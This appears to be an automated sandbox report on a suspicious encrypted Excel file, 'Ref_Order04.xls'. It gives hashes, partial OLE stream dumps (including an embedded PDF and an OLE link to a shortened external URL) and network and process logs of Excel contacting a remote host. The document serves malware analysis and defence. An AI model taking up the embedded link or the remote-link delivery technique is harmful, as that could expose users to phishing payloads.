MD5: | FB94BDA2B8A5908CA1EFDAA64278667C |
SHA1: | C581CA896A6EA34CC8A8346D75918FC883699FA5 |
SHA-256: | 3FD72127EF7CA095F58D8A3348BCA17479F12B9CFC6D10B8F43CF868329090CB |
SHA-512: | 75087589A8FDBEAD05F6F31914B52A9825904A105A8C68FACA5123DF5EB76F789ADBC0F5D3260057C27735CD78C623BDFECC69C38FC54E62709076CFAFD4E1F1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 355328 |
Entropy (8bit): | 7.8384390402996065 |
Encrypted: | false |
SSDEEP: | 6144:uSunQxEtjPOtioVjDGUU1qfDlavx+fgLX0d6XivFbVIO/Z6wXlyeFf5mTy/1zwqs:uTZYbVDMwXlHNmy/5Xl8D |
MD5: | FB94BDA2B8A5908CA1EFDAA64278667C |
SHA1: | C581CA896A6EA34CC8A8346D75918FC883699FA5 |
SHA-256: | 3FD72127EF7CA095F58D8A3348BCA17479F12B9CFC6D10B8F43CF868329090CB |
SHA-512: | 75087589A8FDBEAD05F6F31914B52A9825904A105A8C68FACA5123DF5EB76F789ADBC0F5D3260057C27735CD78C623BDFECC69C38FC54E62709076CFAFD4E1F1 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.533011884584972 |
TrID: |
|
File name: | Ref_Order04.xls |
File size: | 303'616 bytes |
MD5: | 5b24902f7744cc11bd53c183497fbaf7 |
SHA1: | b70311f80381bd3b80d65a99e46bc390f91ea576 |
SHA256: | 2b49a09f9adf8b45deac6c22dd8ff0409fff3092196327c4e231ae4245a289a1 |
SHA512: | 27f77510e3b6b8719913f5b6af939f2a3c34d266d70f0e2531149a77ee9ad9f46f639eb27f1b59e892a5d4860b44b2ed9361a59bca932c4310a5e54cb5f4e88a |
SSDEEP: | 6144:vYunnY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVhiMIoxLbsbvEMPLNhdG:vBK3bVhiMIsLJMjNhdG |
TLSH: | 2F54E011FE418716E465477198F70FAA6265FC412F934B0B325CFA2D3DF02E86D2BA62 |
File Content Preview: | ........................>......................................................./.......b...................................................................................................................................................................... |
Icon Hash: | 276ea3a6a6b7bfbf |
Document Type: | OLE |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | Microsoft Excel |
Encrypted Document: | True |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Code Page: | 1252 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2024-04-23 06:24:16 |
Creating Application: | |
Security: | 1 |
Document Code Page: | 1252 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 786432 |
General | |
Stream Path: | \x1CompObj |
CLSID: | |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.25248375192737 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x5DocumentSummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 244 |
Entropy: | 2.889430592781307 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00 |
General | |
Stream Path: | \x5SummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 200 |
Entropy: | 3.2603503175049817 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . F . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00 |
General | |
Stream Path: | MBD0001E584/\x1CompObj |
CLSID: | |
File Type: | data |
Stream Size: | 94 |
Entropy: | 4.345966460061678 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | MBD0001E584/\x1Ole |
CLSID: | |
File Type: | data |
Stream Size: | 62 |
Entropy: | 2.7788384466112834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 3 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 33 00 |
Stream Path: MBD0001E584/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 20909
General | |
Stream Path: | MBD0001E584/CONTENTS |
CLSID: | |
File Type: | PDF document, version 1.7, 1 pages |
Stream Size: | 20909 |
Entropy: | 7.967116806702583 |
Base64 Encoded: | True |
Data ASCII: | % P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d |
Data Raw: | 25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65 |
General | |
Stream Path: | MBD0001E585/\x1CompObj |
CLSID: | |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.25248375192737 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | MBD0001E585/\x5DocumentSummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 708 |
Entropy: | 3.6235698530352805 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00 |
General | |
Stream Path: | MBD0001E585/\x5SummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 23248 |
Entropy: | 3.0259101830314297 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00 |
General | |
Stream Path: | MBD0001E585/Workbook |
CLSID: | |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 97808 |
Entropy: | 7.365133585376088 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
General | |
Stream Path: | MBD0001E586/\x1Ole |
CLSID: | |
File Type: | data |
Stream Size: | 428 |
Entropy: | 6.141664411264563 |
Base64 Encoded: | False |
Data ASCII: | . . . . t 8 # G . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . b . u . n . . . i . s . / . m . j . a . i . 3 . 9 . . . . - j . \\ A . 8 9 . 1 ? . F . G D Q | u c U * # . - . . L . g 6 v . . ! x . . . ( - b g < m . . U D b S Q . . U M & . L % 4 d . . t $ ~ . U . . . H E ; . . b . y D v . V M g . . . _ Y r . D . . . . . . . . . . . . . . . . b . . . 4 . 4 . O . n . w . e . B . s . b . w . Z . 8 . k . V . j . l . i . L . I . g . s . e . 6 . e . 9 . K . m . K . e . Y . s . 5 . i . n |
Data Raw: | 01 00 00 02 99 74 da 38 f2 23 c3 47 00 00 00 00 00 00 00 00 00 00 00 00 ea 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e6 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 62 00 75 00 6e 00 2e 00 69 00 73 00 2f 00 6d 00 6a 00 61 00 69 00 33 00 39 00 00 00 08 2d 6a 16 5c 41 a7 19 38 39 ea 16 31 3f 0b 98 b8 46 d6 89 47 44 51 7c b2 75 ec e3 63 97 d3 55 92 2a 23 d3 92 b7 |
General | |
Stream Path: | Workbook |
CLSID: | |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 152273 |
Entropy: | 7.995741186212055 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . / . 6 . . . . . . . 4 . $ . . > . ( { i 9 . . 9 { z \\ : ? I 7 . 5 } x u z . . . . . . . . . . . \\ . p . - S } - u I K . O s Y . } . ? . . / O D l . ) / % . ] c . 0 . \\ B z b ] - [ j X Z Y . . ' V . . 0 ] ] I - 6 y # r _ ! l . . ? S B . . . e a . . . . . . = . . . q . ( . . . = g . J b . U . d F . . . . ? 2 . . . . . . . . & . . . . . . . . . . . . . P @ = . . . P , . " f _ @ . . . . . . . J " . . . ^ . . . . . b . . . . . . . . d 1 . . . y ? . . . y $ \\ J D F H L . . . t |
Data Raw: | 09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 ec 34 8c 06 eb 24 fe 01 dd 7f 3e f5 e5 05 28 a8 d8 7b 69 bf 9c 39 10 94 16 39 ce 7b 7a e2 9b 5c 3a ad a6 3f 49 37 12 96 97 8e 35 7d 78 75 7a cc e1 00 02 00 b0 04 c1 00 02 00 16 98 e2 00 00 00 5c 00 70 00 2d 53 7d a6 c0 cb 2d 75 49 4b 08 4f 73 59 e1 ab d2 9c 7d 18 20 3f a3 b3 f9 13 b1 0a a3 b1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 24, 2024 06:51:00.066986084 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.226533890 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.226705074 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.227014065 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.386332035 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.404850006 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.404886007 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.404968023 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405000925 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405024052 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405024052 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405024052 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405031919 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405061960 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405061960 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405065060 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405095100 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405114889 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405127048 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405162096 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405201912 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405201912 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405201912 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405630112 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.411715031 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.411789894 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.567353964 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:18.796511889 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:18.956057072 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:18.956332922 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:18.956476927 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.115734100 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.133929968 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134038925 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134079933 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134128094 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134134054 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134177923 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134181976 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134231091 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134241104 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134284019 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134295940 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134298086 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134332895 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134355068 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134458065 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.139707088 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.139796972 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.294823885 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 24, 2024 06:50:59.888587952 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 24, 2024 06:51:00.059905052 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 24, 2024 06:50:59.888587952 CEST | 192.168.2.22 | 8.8.8.8 | 0x10d9 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 24, 2024 06:51:00.059905052 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d9 | No error (0) | 76.76.21.98 | A (IP address) | IN (0x0001) | false | ||
Apr 24, 2024 06:51:00.059905052 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d9 | No error (0) | 76.76.21.142 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 76.76.21.98 | 80 | 1908 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 24, 2024 06:51:00.227014065 CEST | 319 | OUT | |
Apr 24, 2024 06:51:00.404850006 CEST | 45 | IN | |
Apr 24, 2024 06:51:00.404886007 CEST | 2 | IN | |
Apr 24, 2024 06:51:00.404968023 CEST | 12 | IN | |
Apr 24, 2024 06:51:00.405000925 CEST | 8 | IN | |
Apr 24, 2024 06:51:00.405031919 CEST | 23 | IN | |
Apr 24, 2024 06:51:00.405065060 CEST | 2 | IN | |
Apr 24, 2024 06:51:00.405095100 CEST | 7 | IN | |
Apr 24, 2024 06:51:00.405127048 CEST | 63 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 76.76.21.98 | 80 | 1908 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 24, 2024 06:51:18.956476927 CEST | 319 | OUT | |
Apr 24, 2024 06:51:19.133929968 CEST | 45 | IN | |
Apr 24, 2024 06:51:19.134079933 CEST | 14 | IN | |
Apr 24, 2024 06:51:19.134128094 CEST | 10 | IN | |
Apr 24, 2024 06:51:19.134177923 CEST | 21 | IN | |
Apr 24, 2024 06:51:19.134241104 CEST | 9 | IN | |
Apr 24, 2024 06:51:19.134284019 CEST | 63 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 06:50:37 |
Start date: | 24/04/2024 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f070000 |
File size: | 28'253'536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 06:51:05 |
Start date: | 24/04/2024 |
Path: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1360000 |
File size: | 2'525'680 bytes |
MD5 hash: | 2F8D93826B8CBF9290BC57535C7A6817 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 06:51:20 |
Start date: | 24/04/2024 |
Path: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd0000 |
File size: | 9'805'808 bytes |
MD5 hash: | 326A645391A97C760B60C558A35BB068 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |